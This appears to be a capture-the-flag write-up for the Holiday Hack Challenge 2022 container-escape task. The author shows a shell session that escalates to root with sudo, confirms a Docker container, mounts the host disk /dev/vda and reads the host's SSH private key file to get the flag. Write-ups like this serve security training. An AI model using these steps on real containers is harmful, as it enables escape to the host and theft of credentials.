Escape from a container. Get hints for this challenge from Bow Ninecandle in the Elfen Ring. What hex string appears in the host file /home/jailer/.ssh/jail.key.priv
?
Let's open the terminal:
######################################################
Sat Dec 10 23:41:50 UTC 2022
On attempt [5] of trying to connect.
If no connection is made after [60] attempts
contact the holidayhack sys admins via discord.
######################################################
Greetings Noble Player,
You find yourself in a jail with a recently captured Dwarven Elf.
He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine.
If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"
Please, do your best to un-contain yourself and find the keys to both of your freedom.
grinchum-land:~$
Checking sudo permissions is always a good idea:
grinchum-land:~$ sudo -l
User samways may run the following commands on grinchum-land:
(ALL) NOPASSWD: ALL
grinchum-land:~$ sudo /bin/bash
The challenge already told us about containers, but just to be sure we're in a container:
grinchum-land:/home/samways# cat /proc/1/cgroup
...
1:name=systemd:/docker/e5889892af2e4ea4a3bed5dea6053f0484ab8c2798e0703b7b7616e323e628c9
0::/docker/e5889892af2e4ea4a3bed5dea6053f0484ab8c2798e0703b7b7616e323e628c9
Maybe our container has more permissions than it should have. Let's do a quick fdisk
check:
grinchum-land:/home/samways# fdisk -l
Disk /dev/vda: 2048 MB, 2147483648 bytes, 4194304 sectors
2048 cylinders, 64 heads, 32 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Disk /dev/vda doesn't contain a valid partition table
Why not trying to mount that disk and see if we can access the host's files?
grinchum-land:/home/samways# mkdir mnt
grinchum-land:/home/samways# mount /dev/vda mnt/
grinchum-land:/home/samways# find mnt/home/
mnt/home/
mnt/home/jailer
mnt/home/jailer/.ssh
mnt/home/jailer/.ssh/jail.key.pub
mnt/home/jailer/.ssh/jail.key.priv
grinchum-land:/home/samways# cat mnt/home/jailer/.ssh/jail.key.priv
Congratulations!
You've found the secret for the
HHC22 container escape challenge!
.--._..--.
___ ( _'-_ -_.'
_.-' `-._| - :- |
...
.'_ `.
.'_ 082bb339ec19de4935867 `-.
`--..____ _`.
...
| -_ -_|
grinchum-land:/home/samways#
We have solved that challenge and get the confirmation:
Find the Next Objective
Talk to Tinsel Upatree for the next objective.
We get following hints:
The thing about Git is that every step of development is accessible – even steps you didn't mean to take! git log
can show code skeletons.
If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.